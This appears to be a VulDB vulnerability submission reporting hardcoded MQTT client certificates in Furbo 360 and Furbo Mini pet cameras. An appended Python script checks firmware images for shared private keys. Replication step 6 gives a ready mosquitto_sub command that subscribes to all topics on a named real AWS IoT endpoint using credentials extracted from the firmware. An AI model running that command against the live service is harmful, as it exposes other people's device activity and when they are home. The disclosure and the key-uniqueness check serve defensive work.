| Title | Tomofun Furbo 360, Furbo Mini: Furbo 360 (≤ FB0035_FW_036), Furbo Mini (≤ MC0020_FW_074) Hardcoded Credentials |
|---|
| Description | Furbo devices have a hardcoded MQTT client certificate which is not unique. As a result, an attacker who retrieves and decrypts the Furbo firmware can impersonate any device and connect to Furbo's MQTT infrastructure as a client. The device IDs of all users can be retrieved, and an attacker can identify what is being performed with a device at a specific point in time. Combined with account IDs being issued sequentially, this issue could allow an attacker to identify which device is associated with a specific account, and subsequently map out the actions that are performed on it throughout the day. This information could be used to identify when an owner is home based on their device interactions.
Replication steps:
1. Retrieve the Furbo firmware, and decrypt it.
2. Decompress the firmware with binwalk.
3. Navigate to: /squashfs-root/furbo_img
4. Decompress the squash file.
5. Navigate into: /_furbo_service-<SVC VERSION>.sqsh.extracted/squashfs-root/config/
6. Run:
    mosquitto_sub \
    -h ach7ixmm2osx.iot.us-east-1.amazonaws.com \
    -p 8883 \
    --cafile root_CA.pem \
    --cert furbo3.certificate.pem.crt \
    --key furbo3.private.pem.key \
    -t '#' \
    -d
7. Observe that you are subscribed to the endpoint as a "Furbo device" and can observe actions from every other Furbo device in the world. |
|---|
| User | jTag Labs (UID 51246) |
|---|
| Submission | 09/24/2025 16:03 (7 months ago) |
|---|
| Moderation | 10/11/2025 20:33 (17 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 328054 [Tomofun Furbo 360/Furbo Mini MQTT Client Certificate /squashfs-root/furbo_img hard-coded credentials] |
|---|
| Points | 17 |
|---|
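
A release-time check for the condition described in the submission, added here as an example and not part of the original report or of Tomofun's code: it fingerprints every PEM private key in two extracted device images and reports any key present in both, which means the client credential is not unique per device. The function names and the placeholder key bytes are constructed for illustration; only the file name `furbo3.private.pem.key` comes from the page.

```python
import base64, hashlib, os, re, tempfile

# Matches any PEM block and captures its label and base64 body.
PEM_RE = re.compile(
    rb"-----BEGIN ([A-Z0-9 ]+)-----\s*(.*?)\s*-----END \1-----", re.S)

def pem_fingerprints(root):
    """Map SHA-256 of each PEM block's decoded bytes -> (label, relative path)."""
    found = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable file (device node, broken link)
            for label, body in PEM_RE.findall(data):
                try:
                    der = base64.b64decode(b"".join(body.split()), validate=True)
                except ValueError:
                    continue  # body is not plain base64 (e.g. encrypted-key headers)
                found[hashlib.sha256(der).hexdigest()] = (
                    label.decode(), os.path.relpath(path, root))
    return found

def shared_private_keys(root_a, root_b):
    """Private keys that appear, byte for byte, in both extracted images."""
    a, b = pem_fingerprints(root_a), pem_fingerprints(root_b)
    return sorted(a[d] for d in a.keys() & b.keys()
                  if "PRIVATE KEY" in a[d][0])

def pem(label, raw):
    """Wrap constructed bytes in PEM armour (sample data, not a real key)."""
    b64 = base64.encodebytes(raw).decode()
    return f"-----BEGIN {label}-----\n{b64}-----END {label}-----\n"

def demo():
    """Two constructed 'device images' that ship the same placeholder key."""
    with tempfile.TemporaryDirectory() as a, tempfile.TemporaryDirectory() as b:
        for root in (a, b):
            os.makedirs(os.path.join(root, "config"))
            with open(os.path.join(root, "config",
                                   "furbo3.private.pem.key"), "w") as fh:
                fh.write(pem("RSA PRIVATE KEY", b"constructed-placeholder-key"))
        return shared_private_keys(a, b)
```

An empty result for images taken from two different units is the passing condition; any entry is a private key that was baked into the firmware rather than provisioned per device.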